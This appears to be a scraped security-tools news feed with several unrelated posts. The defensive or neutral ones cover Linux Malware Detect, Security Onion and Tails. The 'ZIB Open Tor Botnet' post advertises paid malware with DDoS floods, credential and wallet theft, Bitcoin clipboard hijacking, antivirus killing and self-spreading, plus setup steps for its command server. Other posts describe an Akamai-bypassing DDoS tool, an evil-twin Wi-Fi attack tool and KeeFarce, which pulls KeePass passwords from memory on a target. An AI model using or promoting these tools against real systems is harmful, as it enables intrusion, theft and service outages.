  • kernel inotify alerting through daily and/or optional weekly reports
  • e-mail alert reporting after every scan execution (manual & daily)
  • path, extension and signature based ignore options
  • background scanner option for unattended scan operations
  • verbose logging & output of all actions


Source Data:
The defining difference with LMD is that it doesn’t just detect malware based on signatures/hashes that someone else generated but rather it is an encompassing project that actively tracks in the wild threats and generates signatures based on those real world threats that are currently circulating.

There are four main sources for malware data that is used to generate LMD signatures:
Network Edge IPS: Through networks managed as part of my day-to-day job, primarily web hosting related, our web servers receive a large amount of daily abuse events, all of which is logged by our network edge IPS. The IPS events are processed to extract malware url’s, decode POST payload and base64/gzip encoded abuse data and ultimately that malware is retrieved, reviewed, classified and then signatures generated as appropriate. The vast majority of LMD signatures have been derived from IPS extracted data.
Community Data: Data is aggregated from multiple community malware websites such as clean-mx and malwaredomainlist then processed to retrieve new malware, review, classify and then generate signatures.
ClamAV: The HEX & MD5 detection signatures from ClamAV are monitored for relevant updates that apply to the target user group of LMD and added to the project as appropriate. To date there has been roughly 400 signatures ported from ClamAV while the LMD project has contributed back to ClamAV by submitting over 1,100 signatures and continues to do so on an ongoing basis.
User Submission: LMD has a checkout feature that allows users to submit suspected malware for review, this has grown into a very popular feature and generates on average about 30-50 submissions per week.

Signature Updates:
The LMD signature are updated typically once per day or more frequently depending on incoming threat data from the LMD checkout feature, IPS malware extraction and other sources. The updating of signatures in LMD installations is performed daily through the default cron.daily script with the –update option, which can be run manually at any time.

An RSS feed is available for tracking malware threat updates: http://www.rfxn.com/api/lmd

Detected Threats:
LMD 1.5 has a total of 10,822 (8,908 MD5 / 1,914) signatures, before any updates. The top 60 threats by prevalence detected by LMD are as follows:
base64.inject.unclassed     perl.ircbot.xscan
bin.dccserv.irsexxy perl.mailer.yellsoft
bin.fakeproc.Xnuxer perl.shell.cbLorD
bin.ircbot.nbot perl.shell.cgitelnet
bin.ircbot.php3 php.cmdshell.c100
bin.ircbot.unclassed php.cmdshell.c99
bin.pktflood.ABC123 php.cmdshell.cih
bin.pktflood.osf php.cmdshell.egyspider
bin.trojan.linuxsmalli php.cmdshell.fx29
c.ircbot.tsunami php.cmdshell.ItsmYarD
exp.linux.rstb php.cmdshell.Ketemu
exp.linux.unclassed php.cmdshell.N3tshell
exp.setuid0.unclassed php.cmdshell.r57
gzbase64.inject php.cmdshell.unclassed
html.phishing.auc61 php.defash.buno
html.phishing.hsbc php.exe.globals
perl.connback.DataCha0s php.include.remote
perl.connback.N2 php.ircbot.InsideTeam
perl.cpanel.cpwrap php.ircbot.lolwut
perl.ircbot.atrixteam php.ircbot.sniper
perl.ircbot.bRuNo php.ircbot.vj_denie
perl.ircbot.Clx php.mailer.10hack
perl.ircbot.devil php.mailer.bombam
perl.ircbot.fx29 php.mailer.PostMan
perl.ircbot.magnum php.phishing.AliKay
perl.ircbot.oldwolf php.phishing.mrbrain
perl.ircbot.putr4XtReme php.phishing.ReZulT
perl.ircbot.rafflesia php.pktflood.oey
perl.ircbot.UberCracker php.shell.rc99
perl.ircbot.xdh php.shell.shellcomm


Real-Time Monitoring:
The inotify monitoring feature is designed to monitor paths/users in real-time for file creation/modify/move operations. This option requires a kernel that supports inotify_watch (CONFIG_INOTIFY) which is found in kernels 2.6.13+ and CentOS/RHEL 5 by default. If you are running CentOS 4 you should consider an inbox upgrade with:

There are three modes that the monitor can be executed with and they relate to what will be monitored, they are USERS|PATHS|FILES.
       e.g: maldet --monitor users
e.g: maldet --monitor /root/monitor_paths
e.g: maldet --monitor /home/mike,/home/ashton

The options break down as follows:
USERS: The users option will take the homedirs of all system users that are above inotify_minuid and monitor them. If inotify_webdir is set then the users webdir, if it exists, will only be monitored.
PATHS: A comma spaced list of paths to monitor
FILE: A line spaced file list of paths to monitor

Once you start maldet in monitor mode, it will preprocess the paths based on the option specified followed by starting the inotify process. The starting of the inotify process can be a time consuming task as it needs to setup a monitor hook for every file under the monitored paths. Although the startup process can impact the load temporarily, once the process has started it maintains all of its resources inside kernel memory and has a very small userspace footprint in memory or cpu usage.


ZIB - The Open Tor Botnet

$
0
0

General information and instructions.

The Open Tor Botnet requires the installation and configuration of bitcoind, however I neglect to detail this here out of a lack of time.
This bot-net is fully undetectable and bypasses all antivirus through running on top of Python27's pyinstaller, which is used for many non-Trojan computer programs. The only hypothetical possibility of detection comes from the script, however, the script contains randomized-looking data through using a randomized AES key and initialization vector, meaning this is a non-issue.

ZIB.py is the main project file.
intel.py is the chat bot for handling automatic transactions and client authentication.
compileZIB.py is used by intel.py, and is started in the background using chp.exe
ZIB_imports.txt contains all the Python module imports that ZIB uses. They're appended to the script during compilation.
btcpurchases.txt includes all the Bitcoin payments that are pending. Pending transactions older than 24 hours are deleted.
channels.txt includes all completed BTC payments.
Point your webserver to C:\Python27\dist\ for hosting the bot executables.
chp.exe is required in the local dir.
For the IRC server, run bircd, set up an oper with the username Zlo and password RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$RUSSIA!@#$. For the max users per ip set to 0 because tor users all connect from 127.0.0.1 and look the same to the IRCd. Keep all scripts in C:\Python27\Scripts.
Put nircmd in the local directory for editing file dates.

Features

  • ZIB is an IRC-based, Bitcoin-funded bot network that runs under Tor for anonymity.
  • ZIB is coded totally from scratch.
  • ZIB uses the Department of Defense standard for encryption of Top Sercret files as one methods of generating fully undetectable binaries every time!
  • ZIB creates a new binary for every client with varying file sizes, creation dates, and rot13->zlib->base64->AES-256(random key+IV) encrypted strings.
  • ZIB is fully undetectable (FUD) to Anti-Virus.
  • ZIB has an automated system for handling payments, providing bot-net binaries, and creating bot-net IRC channels.
  • All bot networks on a ZIB network require a password to join.
  • ZIB uses passworded user-based authentication, handled through our Zlo intelligence bot, so you don't have to worry about channel password, main password, or bot compromise. Normal users can't create their own channels. All IRC functionalities are handled by the Zlo IRC intelligence bot. You can do authenticated, single bot commands through Zlo, or set up a user session on your bots, which is slightly less secure.
  • Paid users get unlimited bot space per channel.
  • Our bot has been tested on and is fully compatible with Windows Server 2008 R2 32-bit, Windows XP SP1 & SP3 32-bit, Windows 7, and Windows 8 64-bit.


Features

  • Multi-threaded HTTP/s (layer7 [Methods: TorsHammer, PostIt, Hulk, ApacheKiller, Slowloris, GoldenEye]), TCP/SSL, and fine-tuned UDP flooding. Ability to flood hidden services, or attack via the clearnet. 66 randomized DDoS user-agents and referers. All methods send randomized data, bypass firewalls, filtering, and caching. ZIB also comes with FTP flood, and TeamSpeak flood.
  • Undetectable ad-fraud smart viewer that's fully compatible with Firefox, Tor Browser Bundle, Portable Firefox, Internet Explorer, Google Chrome, Opera, Yandex, Torch, FlashPeak SlimBrowser, Epic Privacy Browser, Baidu, Maxthon, Comodo IceDragon, and QupZilla.
  • Download & Execute w/ optional SHA256 verification.
  • Update w/ optional SHA256 verification.
  • Chrome password recovery.
  • Each bot can act as a shell booter and utilize external php shells for attacks.
  • Replace Bitcoin addresses in clipboard with yours.
  • FileZilla password recovery.
  • Fully routed through Tor.
  • File, registry, startup folder, and main/daemon/tor process persistence.
  • Installation and use is completely hidden from bots.
  • 0/60 Fully undetectable to Antivirus.
  • File download/upload.
  • Process status, creator, and killer.
  • Undetectable, instant obfuscation when generating new binaries.
  • Self spreading.
  • All bot files are SHA256 hash verified. Broken/corrupted files get replaced.
  • Bypasses AntiVirus Deep-Scan.
  • Bot location varies, depending on administrative access.
  • IRC nickname format: Country[version]windows version|CPU bits|User Privileges|CPU cores|random characters. Ex: US[v2]XP|x32|A|4c|F4L0s4kpN5. 64-bit detection may be having issues (shows up as 32-bit).
  • Disables various windows functions WITHOUT giving the user warnings!
  • Disables Microsoft Windows error reporting, sending additional data, and error logging - System-wide as administrator, and on a per-user basis.
  • Disables User Access Control (UAC) - System-wide as administrator, and on a per-user basis.
  • Disables Windows Volume Shadow Copy Backup Service (vss) - System-wide as administrator.
  • Disables System Restore Service (srservice) - System-Wide as administrator.
  • Disables System Restore - System-Wide as administrator.
  • Melts on execution. Original file gets deleted. Should delete the file out of the temporary folder, if used with a binder.
  • Multi-threaded mass SSH scanner that saves servers are on the bot's HDD encoded with base64 without duplicates, or honeypots. Four integrated password lists of increasing difficulty [A,B,C,D], or brute force with min/max characters (supports numbers, upper/lowercase letters, symbols). Cracked routers are used for UDP/TCP/HTTP/ICMP flooding. UDP flood requires having the routers download a python script, and the majority of routers won't have Python. Has the ability to be used to take down DDoS-protected servers from scanning with just one bot. The Open Tor Botnet optionally will scan under Tor, multiple ports at once, ip range/s [A/B/C] or randomized IPs, optionally block government IPs, blocks reserved IPv4 addresses aside from the user's LAN. BotKiller with file scanning [kills .exe, .bat, .scr, .pif, .dll, .lnk, .com] in AppData, Startup, etc and has been successful against NanoCore, Andromeda, AGhost Silent Miner, Plasma HTTP/IRC/RAT, and almost every HackForums bot. The botkiller utilizes process scanning with file deletion, and registry scanning.
  • Mutex. No duplicate IRC connections.
  • Amazing error handling, install rate, detection ratio, and persistence.
  • Completely native malware. No .NET framework, or Python installation required!
  • Installs to the startup folder & AppData with a registry RUN key.
  • Kills all popular anti-virus and prevents A/V installation. Will disable Anti-Virus which have rootkits, through deleting important A/V dlls.
  • BotKiller, scanner, and A/V killer are optional. You could easily run the Open Tor botnet as a back-up for your bots, or install other software on them as back-up. The network control system is highly scaleable. Duel-process and duel-file persistence. Files processes are re-created nearly instantly, after being removed.
  • Recovers File-Zilla logins, which is great for getting SSH, and FTP logins.
  • Automatically removes some ad-ware.
  • Contains an Omegle spreader which spreads either a link through social engineering tactics, or a Skype account with every line of text being completely unique in order to avoid detection. Always waits for the Omegle stranger to type a message before responding with a reply. Shows stranger typing, and writes messages human-like. Multi-threaded.
  • Deletes zone identifier on all bot files, Tor, download & executed files, and update files. This means that you don't get the "Would you like to run this program?" dialog, and it runs completely hidden.
  • Detects all Windows operating systems from Windows 95, ME, to 8. Will show Windows 10 as just Windows, or W8. Text-To-Speech with speaker detection.
  • Duplicate nick-name handling, and ping-out handling.
  • Tor is downloaded directly from the Tor Project - It only needs to be downloaded once, but still has persistence.
  • Grabs the bot IP address on startup, has the ability to disable/enable bot command response, view status of ssh scanner/omegle spreading/ddos/botkiller and start/stop them.
  • Functionality to kill the bot instance, uninstall ZIB, grab full OS info, check if a host on a certain port is online/offline using TCP connect and a full HTTP request whilst checking the reply for server status related information.
  • Check if a process is running, how many are running, and list directories. Use \ instead of C:\, e.x !dir \ as some people run their main operating system on non-standard drive letters, especially on servers.
  • Upload specific files of your choosing that exist on a bot's computer to your FTP server. Files that can be uploaded could include BTC wallets.
  • Read files in plain-text off zombie computers. View amount of scanned SSH servers. Kill processes. The bot will tell you about missing command parameters, if a certain parameter contains the wrong data-type, etc. Errors from executing a command are outputted to the IRC channel without flooding the chat.
  • Commands are ran mutli-threaded and con-currently. This means your bots wont freeze up each time you run a command.



Infernal-Twin - This Is Evil Twin Attack Automated (Wireless Hacking)

$
0
0

This tool is created to aid the penetration testers in assessing wireless security. Author is not responsible for misuse. Please read instructions thoroughly.

Usage
sudo python InfernalWireless.py

How to install
$ sudo apt-get install apache2
$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql

$ sudo apt-get install python-scapy
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb

$ sudo apt-get install aircrack-ng

$ git clone https://github.com/entropy1337/infernal-twin.git
$ cd infernal-twin


$ python db_connect_creds.py
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root

FAQ:

I have a problem with connecting to the Database
Solution:
(Thanks to @lightos for this fix)
There seem to be few issues with Database connectivity. The solution is to create a new user on the database and use that user for launching the tool. Follow the following steps.
  1. Delete dbconnect.conf file from the Infernalwireless folder
  2. Run the following command from your mysql console.
    mysql> use mysql;
    mysql> CREATE USER 'root2'@'localhost' IDENTIFIED BY 'enter the new password here';
    mysql> GRANT ALL PRIVILEGES ON \*.\* TO 'root2'@'localhost' WITH GRANT OPTION;
  3. Try to run the tool again.

Release Notes:

New Features:
  • GUI Wireless security assessment SUIT
  • Impelemented
  • WPA2 hacking
  • WEP Hacking
  • WPA2 Enterprise hacking
  • Wireless Social Engineering
  • SSL Strip
  • Report generation
  • PDF Report
  • HTML Report
  • Note taking function
  • Data is saved into Database
  • Network mapping
  • MiTM
  • Probe Request

Changes:
  • Improved compatibility
  • Report improvement
  • Better NAT Rules

Bug Fixes:
  • Wireless Evil Access Point traffic redirect
  • Fixed WPA2 Cracking
  • Fixed Infernal Wireless
  • Fixed Free AP
  • Check for requirements
  • DB implementation via config file
  • Improved Catch and error
  • Check for requirements
  • Works with Kali 2

Coming Soon:
  • Parsing t-shark log files for gathering creds and more
  • More attacks.

Expected bugs:
  • Wireless card might not be supported
  • Windodw might crash
  • Freeze
  • A lot of work to be done, but this tool is still being developed.


ARDT - Akamai Reflective DDoS Tool

$
0
0

Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.

How it works...

Akamai boast around 100,000 edge nodes around the world which offer load balancing, web application firewall, caching etc, to ensure that a minimal amount of requests actually hit your origin web-server beign protected. However, the issue with caching is that you cannot cache something that is non-deterministic, I.E a search result. A search that has not been requested before is likely not in the cache, and will result in a Cache-Miss, and the Akamai edge node requesting the resource from the origin server itself.

What this tool does is, provided a list of Akamai edge nodes and a valid cache missing request, produces multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, sending requests at around 20 per second, with 100,000 Akamai edge node list, and a request which resulting in 10KB hitting the origin, if my calculations are correct, thats around 976MB/ps hitting the origin server, which is a hell of a lot of traffic.

Finding Akamai Edge Nodes

To find Akamai Edge Nodes, the following script has been included:
# python ARDT_Akamai_EdgeNode_Finder.py
This can be edited quite easily to find more, it then saves the IPS automatically.


KeeFarce - Extracts Passwords From A Keepass 2.X Database, Directly From Memory

$
0
0


KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and url's are dumped into a CSV file in %AppData%

General Design
KeeFarce uses DLL injection to execute code within the context of a running KeePass process. C# code execution is achieved by first injecting an architecture-appropriate bootstrap DLL. This spawns an instance of the dot net runtime within the appropriate app domain, subsequently executing KeeFarceDLL.dll (the main C# payload).
The KeeFarceDLL uses CLRMD to find the necessary object in the KeePass processes heap, locates the pointers to some required sub-objects (using offsets), and uses reflection to call an export method.

Prebuilt Packages
An appropriate build of KeeFarce needs to be used depending on the KeePass target's architecture (32 bit or 64 bit). Archives and their shasums can be found under the 'prebuilt' directory.

Executing
In order to execute on the target host, the following files need to be in the same folder:
  • BootstrapDLL.dll
  • KeeFarce.exe
  • KeeFarceDLL.dll
  • Microsoft.Diagnostic.Runtime.dll
Copy these files across to the target and execute KeeFarce.exe

Building
Open up the KeeFarce.sln with Visual Studio (note: dev was done on Visual Studio 2015) and hit 'build'. The results will be spat out into dist/$architecture. You'll have to copy the KeeFarceDLL.dll files and Microsoft.Diagnostic.Runtime.dll files into the folder before executing, as these are architecture independent.

Compatibility
KeeFarce has been tested on:
  • KeePass 2.28, 2.29 and 2.30 - running on Windows 8.1 - both 32 and 64 bit.
This should also work on older Windows machines (win 7 with a recent service pack). If you're targeting something other than the above, then testing in a lab environment before hand is recommended.

Acknowledgements
  • Sharp Needle by Chad Zawistowski was used for the DLL injection tesh.
  • Code by Alois Kraus was used to get the pointer to object C# voodoo working.


Security Onion - Linux Distro For Intrusion Detection, Network Security Monitoring, And Log Management

$
0
0

Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It's based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!


Easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes


Analyze your NIDS/HIDS alerts with Squert


Pivot between multiple data types with Sguil and send pcaps to Wireshark and NetworkMiner


Use ELSA to slice and dice your logs


Access full packet capture with CapMe


Snort/Suricata and Bro compiled with PF_RING to handle lots of traffic


Easy updates

Data Types

  • Alert data - HIDS alerts from OSSEC and NIDS alerts from Snort/Suricata
  • Asset data from Prads and Bro
  • Full content data from netsniff-ng
  • Host data via OSSEC and syslog-ng
  • Session data from Argus, Prads, and Bro
  • Transaction data - http/ftp/dns/ssl/other logs from Bro

Tails 1.7 - The Amnesic Incognito Live System

$
0
0

Tails is a live operating system, that you can start on almost any computer from a DVD, USB stick, or SD card. It aims at preserving your privacy and anonymity, and helps you to:
  • use the Internet anonymously and circumvent censorship;
    all connections to the Internet are forced to go through the Tor network;
  • leave no trace on the computer you are using unless you ask it explicitly;
  • use state-of-the-art cryptographic tools to encrypt your files, emails and instant messaging.  

Tails, The Amnesic Incognito Live System, version 1.7, is out.
This release fixes numerous security issues. All users must upgrade as soon as possible.

New features

  • You can now start Tails in offline mode to disable all networking for additional security. Doing so can be useful when working on sensitive documents.
  • We added Icedove, a rebranded version of the Mozilla Thunderbird email client.
    Icedove is currently a technology preview. It is safe to use in the context of Tails but it will be better integrated in future versions until we remove Claws Mail. Users of Claws Mail should refer to our instructions to migrate their data from Claws Mail to Icedove.

Upgrades and changes

  • Improve the wording of the first screen of Tails Installer.
  • Restart Tor automatically if connecting to the Tor network takes too long. (#9516)
  • Update several firmware packages which might improve hardware compatibility.
  • Update the Tails signing key which is now valid until 2017.
  • Update Tor Browser to 5.0.4.
  • Update Tor to 0.2.7.4.

Fixed problems

  • Prevent wget from leaking the IP address when using the FTP protocol. (#10364)
  • Prevent symlink attack on ~/.xsession-errors via tails-debugging-info which could be used by the amnesia user to bypass read permissions on any file. (#10333)
  • Force synchronization of data on the USB stick at the end of automatic upgrades. This might fix some reliability bugs in automatic upgrades.
  • Make the "I2P is ready" notification more reliable.

Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>